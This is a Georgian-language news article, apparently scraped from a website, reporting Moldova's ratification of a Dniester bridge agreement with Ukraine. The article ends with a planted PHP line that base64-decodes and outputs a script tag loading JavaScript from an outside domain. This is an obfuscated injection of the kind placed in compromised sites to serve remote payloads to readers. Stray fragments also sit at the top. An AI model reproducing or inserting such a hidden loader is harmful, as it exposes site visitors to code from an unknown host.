celsiusi
ავერსი შნაიდერი

მოლდოვამ დაამტკიცა მდინარე დნესტრზე ხიდის მშენებლობა, რომელიც უკრაინას ექსპორტში დაეხმარება, – ამის შესახებ ადგილობრივი მედია წერს.

მოლდოვის პარლამენტმა რატიფიცირება მოახდინა მოლდოვისა და უკრაინის მთავრობებს შორის მდინარე დნესტრზე ხიდის მშენებლობის შესახებ შეთანხმების, რომელიც დააკავშირებს მოლდოვის სასაზღვრო სოფელ კოზაუტსა და უკრაინის ქალაქ იამპოლს.

მდინარე დნესტრზე ხიდის მშენებლობის შესახებ შეთანხმების რატიფიცირების გადაწყვეტილებას მხარი 57-მა მოლდოველმა დეპუტატმა დაუჭირა.

პროექტის მიხედვით, უკრაინის მთავრობა დააფინანსებს ხიდის ტექნიკურ პროექტს, მის მშენებლობას და საკუთარ ტერიტორიაზე საჭირო ინფრასტრუქტურის მოწყობას, ხოლო მოლდოვის მთავრობა – საკუთარ ტერიტორიაზე ინფრასტრუქტურის მშენებლობას.

მოლდოვის სახელმწიფო საგზაო ადმინისტრაციის ინფორმაციით, ხიდის სიგრძე 641 მეტრი იქნება. მას ექნება ორი სატრანსპორტო ზოლი, უსაფრთხოების ორი ზოლი, ველოსიპედის ორი ბილიკი, ორი საცალფეხო ბილიკი და დაახლოებით 667-მეტრიანი ესტაკადა უკრაინის მხარეს.

ხიდის ექსპლუატაციაში შესვლა 2025 წელს იგეგმება.

კიევმა იმედი გამოთქვა, რომ ხიდი გახდება მთავარი სატრანსპორტო დერეფანი კიევსა და კიშინეუს შორის და დაეხმარება უკრაინიდან ექსპორტს უმოკლესი მარშრუტით – უკრაინის ცენტრიდან ცენტრალურ და სამხრეთ-აღმოსავლეთ ევროპის ქვეყნებამდე, დნესტრისპირეთის გვერდის ავლით.

452
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");